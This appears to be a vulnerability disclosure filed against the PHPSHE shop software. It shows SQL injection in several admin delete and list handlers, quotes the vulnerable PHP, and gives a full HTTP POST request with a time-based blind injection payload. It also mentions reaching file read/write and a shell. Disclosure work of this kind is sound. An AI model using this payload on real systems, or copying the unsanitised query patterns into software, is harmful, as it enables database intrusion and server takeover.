I found multiple SQL injection in the background.

1. a vulnerability point
![输入图片说明](http://p0desta-pictures.test.upcdn.net/20181018210525.png "在这里输入图片标题")

Look at the code

admin/user.php
```
	case 'del':
		pe_token_match();
		if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
			pe_success('会员删除成功!');
		}
		else {
			pe_error('会员删除失败...');
		}
	break;
```
It is found that if one is deleted at a time, intval processing will be performed. If it is deleted in batches, the statement will be directly substituted, and the payload is constructed as follows.

```
POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#
```
![输入图片说明](http://p0desta-pictures.test.upcdn.net/20181018210650.png "在这里输入图片标题")

2. Additional code for this type of situation

admin/userbank.php

```
	case 'del':
		pe_token_match();
		$userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
		if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
			pe_success('删除成功！');
		}
		else {
			pe_error('删除失败...');
		}
	break;
```
admin/userlevel.php

```
	case 'del':
		pe_token_match();
		$userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
		if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
			cache_write('userlevel');
			userlevel_callback();
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;
```
admin/ad.php

```
	case 'del':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
			cache_write('ad');
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;
	//####################// 广告状态 //####################//
	case 'state':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
			cache_write('ad');
			pe_success("操作成功!");
		}
		else {
			pe_error("操作失败...");
		}
	break;
		//####################// 广告列表 //####################//
	default :
		$_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
		$_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
		$sql_where .= " order by `ad_order` asc, `ad_id` desc";
		$info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
```
3. Now I am looking for another example to verify.
![输入图片说明](http://p0desta-pictures.test.upcdn.net/20181018233830.png "在这里输入图片标题")

If there is permission in the target environment, we can read the file or write the file to getshell.
![输入图片说明](http://p0desta-pictures.test.upcdn.net/20181018234501.png "在这里输入图片标题")

koyshe/phpshe

内容风险标识

评论 (0)

koyshe/phpshe .gitee-modal { width: 500px !important; }

内容风险标识